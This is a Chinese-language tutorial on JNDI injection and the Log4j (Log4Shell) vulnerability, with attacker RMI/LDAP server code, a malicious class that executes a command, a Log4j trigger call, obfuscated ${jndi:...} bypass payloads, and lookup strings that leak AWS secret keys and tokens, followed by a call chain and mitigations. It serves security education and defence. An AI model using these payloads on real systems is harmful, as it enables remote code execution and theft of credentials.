JNDI注入与Log4j漏洞深入解析<\/h1>

1. JNDI基础<\/h2>

1.1 JNDI核心类<\/h3>
InitialContext类<\/strong> - JNDI的入口点，用于建立初始上下文环境：<\/p>
\/\/ 构造方法
<\/span><\/span><\/span><\/span>InitialContext()<\/span>  \/\/ 构建一个初始上下文
<\/span><\/span><\/span><\/span>InitialContext(<\/span>boolean<\/span> lazy)<\/span>  \/\/ 构造初始上下文但不初始化
<\/span><\/span><\/span><\/span>InitialContext(<\/span>Hashtable<?,?><\/span> environment)<\/span>  \/\/ 使用提供的环境构建初始上下文
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 常用方法
<\/span><\/span><\/span><\/span>bind(<\/span>Name name,<\/span> Object obj)<\/span>  \/\/ 将名称绑定到对象
<\/span><\/span><\/span><\/span>list(<\/span>String name)<\/span>  \/\/ 枚举绑定的名称及对象类名
<\/span><\/span><\/span><\/span>lookup(<\/span>String name)<\/span>  \/\/ 检索命名对象
<\/span><\/span><\/span><\/span>rebind(<\/span>String name,<\/span> Object obj)<\/span>  \/\/ 绑定名称到对象，覆盖现有绑定
<\/span><\/span><\/span><\/span>unbind(<\/span>String name)<\/span>  \/\/ 取消绑定命名对象
<\/span><\/span><\/span><\/code><\/pre>Reference类<\/strong> - 表示对命名\/目录系统外部对象的引用：<\/p>
\/\/ 构造方法
<\/span><\/span><\/span><\/span>Reference(<\/span>String className)<\/span>  \/\/ 为指定类名构造新引用
<\/span><\/span><\/span><\/span>Reference(<\/span>String className,<\/span> RefAddr addr)<\/span>  \/\/ 为类名和地址构造新引用
<\/span><\/span><\/span><\/span>Reference(<\/span>String className,<\/span> RefAddr addr,<\/span> String factory,<\/span> String factoryLocation)<\/span>
<\/span><\/span>Reference(<\/span>String className,<\/span> String factory,<\/span> String factoryLocation)<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 示例
<\/span><\/span><\/span><\/span>String url =<\/span> "http:\/\/127.0.0.1:8080"<\/span>;<\/span>
<\/span><\/span>Reference reference =<\/span> new<\/span> Reference(<\/span>"test"<\/span>,<\/span> "test"<\/span>,<\/span> url);<\/span>
<\/span><\/span>\/*
<\/span><\/span><\/span>参数1: className - 远程加载时使用的类名
<\/span><\/span><\/span>参数2: classFactory - 需要实例化的类名
<\/span><\/span><\/span>参数3: classFactoryLocation - 提供classes数据的地址(file\/ftp\/http协议)
<\/span><\/span><\/span>*\/<\/span>
<\/span><\/span><\/code><\/pre>2. JNDI注入攻击<\/h2>
2.1 JNDI+RMI攻击<\/h3>
攻击流程<\/strong>：<\/p>

攻击者搭建RMI服务端，绑定恶意Reference对象<\/li>
受害者通过JNDI lookup触发恶意代码加载<\/li>
<\/ol>
服务端代码(攻击者)<\/strong>：<\/p>
Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span>
<\/span><\/span>Reference aa =<\/span> new<\/span> Reference(<\/span>"Calc"<\/span>,<\/span> "Calc"<\/span>,<\/span> "http:\/\/127.0.0.1\/"<\/span>);<\/span>
<\/span><\/span>ReferenceWrapper refObjWrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>aa);<\/span>
<\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"hello"<\/span>,<\/span> refObjWrapper);<\/span>
<\/span><\/span><\/code><\/pre>客户端代码(受害者)<\/strong>：<\/p>
\/\/ 高版本JDK需要设置信任远程代码
<\/span><\/span><\/span><\/span>System.<\/span>setProperty<\/span>(<\/span>"com.sun.jndi.rmi.object.trustURLCodebase"<\/span>,<\/span> "true"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>String uri =<\/span> "rmi:\/\/127.0.0.1:1099\/hello"<\/span>;<\/span>
<\/span><\/span>Context ctx =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>ctx.<\/span>lookup<\/span>(<\/span>uri);<\/span>
<\/span><\/span><\/code><\/pre>恶意类<\/strong>：<\/p>
public<\/span> class<\/span> Calc<\/span> implements<\/span> ObjectFactory {<\/span>
<\/span><\/span>    public<\/span> Calc<\/span>()<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> Object getObjectInstance<\/span>(<\/span>Object obj,<\/span> Name name,<\/span> Context nameCtx,<\/span> 
<\/span><\/span>                                   Hashtable<?,?><\/span> env)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 JNDI+LDAP攻击<\/h3>
服务端代码(攻击者)<\/strong>：<\/p>
int<\/span> port =<\/span> 7777<\/span>;<\/span>
<\/span><\/span>InMemoryDirectoryServerConfig config =<\/span> new<\/span> InMemoryDirectoryServerConfig(<\/span>"dc=example,dc=com"<\/span>);<\/span>
<\/span><\/span>config.<\/span>setListenerConfigs<\/span>(<\/span>new<\/span> InMemoryListenerConfig(<\/span>
<\/span><\/span>    "listen"<\/span>,<\/span> InetAddress.<\/span>getByName<\/span>(<\/span>"0.0.0.0"<\/span>),<\/span> port,<\/span>
<\/span><\/span>    ServerSocketFactory.<\/span>getDefault<\/span>(),<\/span> SocketFactory.<\/span>getDefault<\/span>(),<\/span> 
<\/span><\/span>    (<\/span>SSLSocketFactory)<\/span> SSLSocketFactory.<\/span>getDefault<\/span>()));<\/span>
<\/span><\/span>config.<\/span>addInMemoryOperationInterceptor<\/span>(<\/span>new<\/span> OperationInterceptor(<\/span>new<\/span> URL(<\/span>args[<\/span>0<\/span>])));<\/span>
<\/span><\/span>InMemoryDirectoryServer ds =<\/span> new<\/span> InMemoryDirectoryServer(<\/span>config);<\/span>
<\/span><\/span>ds.<\/span>startListening<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>客户端代码(受害者)<\/strong>：<\/p>
System.<\/span>setProperty<\/span>(<\/span>"com.sun.jndi.ldap.object.trustURLCodebase"<\/span>,<\/span>"true"<\/span>);<\/span>
<\/span><\/span>String url =<\/span> "ldap:\/\/127.0.0.1:7777\/Calc"<\/span>;<\/span>
<\/span><\/span>InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>initialContext.<\/span>lookup<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre>3. Log4j漏洞分析<\/h2>
3.1 漏洞成因<\/h3>
Log4j支持JNDI查找功能，当日志中包含${jndi:...}<\/code>格式的字符串时，会触发JNDI查找，从而间接触发RMI\/LDAP漏洞。<\/p>
漏洞触发示例<\/strong>：<\/p>
private<\/span> static<\/span> final<\/span> Logger logger =<\/span> LogManager.<\/span>getLogger<\/span>();<\/span>
<\/span><\/span>public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>    System.<\/span>setProperty<\/span>(<\/span>"com.sun.jndi.rmi.object.trustURLCodebase"<\/span>,<\/span> "true"<\/span>);<\/span>
<\/span><\/span>    logger.<\/span>error<\/span>(<\/span>"${jndi:rmi:\/\/127.0.0.1:1099\/hello}"<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 调用链分析<\/h3>
Interpolator.lookup() → StrSubstitutor.resolveVariable() → 
StrSubstitutor.substitute() → StrSubstitutor.replace() → 
MessagePatternConverter.format() → PatternFormatter.format() → 
PatternLayout$PatternSerializer.toSerializable() → 
PatternLayout.toText() → PatternLayout.encode() → 
AbstractOutputStreamAppender.directEncodeEvent() → 
AbstractOutputStreamAppender.tryAppend() → 
AbstractOutputStreamAppender.append() → 
AppenderControl.tryCallAppender() → 
LoggerConfig.callAppenders() → 
LoggerConfig.processLogEvent() → 
LoggerConfig.log() → 
DefaultReliabilityStrategy.log() → 
Logger.log() → 
AbstractLogger.tryLogMessage() → 
AbstractLogger.logMessageTrackRecursion() → 
AbstractLogger.logMessageSafely() → 
AbstractLogger.logMessage() → 
AbstractLogger.logIfEnabled() → 
AbstractLogger.error()
<\/code><\/pre>
3.3 绕过Payload<\/h3>
${jndi:ldap:\/\/domain.com\/j}
${jndi:ldap:\/domain.com\/a}
${jndi:dns:\/domain.com}
${jndi:dns:\/\/domain.com\/j}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}:\/\/domain.com\/j}
${${::-j}ndi:rmi:\/\/domain.com\/j}
${jndi:rmi:\/\/domainldap.com\/j}
${${lower:jndi}:${lower:rmi}:\/\/domain.com\/j}
${${lower:${lower:jndi}}:${lower:rmi}:\/\/domain.com\/j}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}:\/\/domain.com\/j}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}:\/\/domain.com\/j}
${jndi:${lower:l}${lower:d}a${lower:p}:\/\/domain.com}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}\/\/domain.com\/a}
jn${env::-}di:jn${date:}di${date:':'}j${k8s:k5:-ND}i${sd:k5:-:}j${main:\k5:-Nd}i${spring:k5:-:}j${sys:k5:-nD}${lower:i${web:k5:-:}}j${::-nD}i${::-:}j${EnV:K5:-nD}i:j${loWer:Nd}i${uPper::}
<\/code><\/pre>
3.4 信息泄露Payload<\/h3>
${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}
<\/code><\/pre>
3.5 Log4j记录的请求头<\/h3>
Log4j会记录以下请求头信息：<\/p>
Accept-Charset, Accept-Datetime, Accept-Encoding, Accept-Language, 
Authorization, Cache-Control, Cf-Connecting_ip, Client-Ip, Contact, 
Cookie, DNT, Forwarded, Forwarded-For, Forwarded-For-Ip, 
Forwarded-Proto, From, If-Modified-Since, Max-Forwards, Origin, 
Originating-Ip, Pragma, Referer, TE, True-Client-IP, True-Client-Ip, 
Upgrade, User-Agent, Via, Warning, X-ATT-DeviceId, X-Api-Version, 
X-Att-Deviceid, X-CSRFToken, X-Client-Ip, X-Correlation-ID, 
X-Csrf-Token, X-Do-Not-Track, X-Foo, X-Foo-Bar, X-Forward-For, 
X-Forward-Proto, X-Forwarded, X-Forwarded-By, X-Forwarded-For, 
X-Forwarded-For-Original, X-Forwarded-Host, X-Forwarded-Port, 
X-Forwarded-Proto, X-Forwarded-Protocol, X-Forwarded-Scheme, 
X-Forwarded-Server, X-Forwarded-Ssl, X-Forwarder-For, X-Frame-Options, 
X-From, X-Geoip-Country, X-HTTP-Method-Override, X-Http-Destinationurl, 
X-Http-Host-Override, X-Http-Method, X-Http-Method-Override, 
X-Http-Path-Override, X-Https, X-Htx-Agent, X-Hub-Signature, 
X-If-Unmodified-Since, X-Imbo-Test-Config, X-Insight, X-Ip, X-Ip-Trail, 
X-Leakix, X-Originating-Ip, X-ProxyUser-Ip, X-Real-Ip, X-Remote-Addr, 
X-Remote-Ip, X-Request-ID, X-Requested-With, X-UIDH, X-Wap-Profile, 
X-XSRF-TOKEN, Authorization: Basic, Authorization: Bearer, 
Authorization: Oauth, Authorization: Token
<\/code><\/pre>
4. 防御措施<\/h2>

升级Log4j<\/strong>：使用2.17.0及以上版本<\/li>
禁用JNDI查找<\/strong>：设置log4j2.formatMsgNoLookups=true<\/code><\/li>
限制网络访问<\/strong>：限制应用服务器出站流量<\/li>
JDK防护<\/strong>：

设置com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li>
设置com.sun.jndi.ldap.object.trustURLCodebase=false<\/code><\/li>
<\/ul>
<\/li>
输入过滤<\/strong>：对用户输入进行严格过滤，防止恶意字符串注入<\/li>
<\/ol>
5. 总结<\/h2>
JNDI注入漏洞通过RMI\/LDAP协议实现远程代码执行，而Log4j漏洞则通过日志记录功能间接触发了JNDI注入。攻击者可以利用这些漏洞实现远程命令执行、信息泄露等恶意操作。理解这些漏洞的原理和利用方式对于安全防护至关重要。<\/p>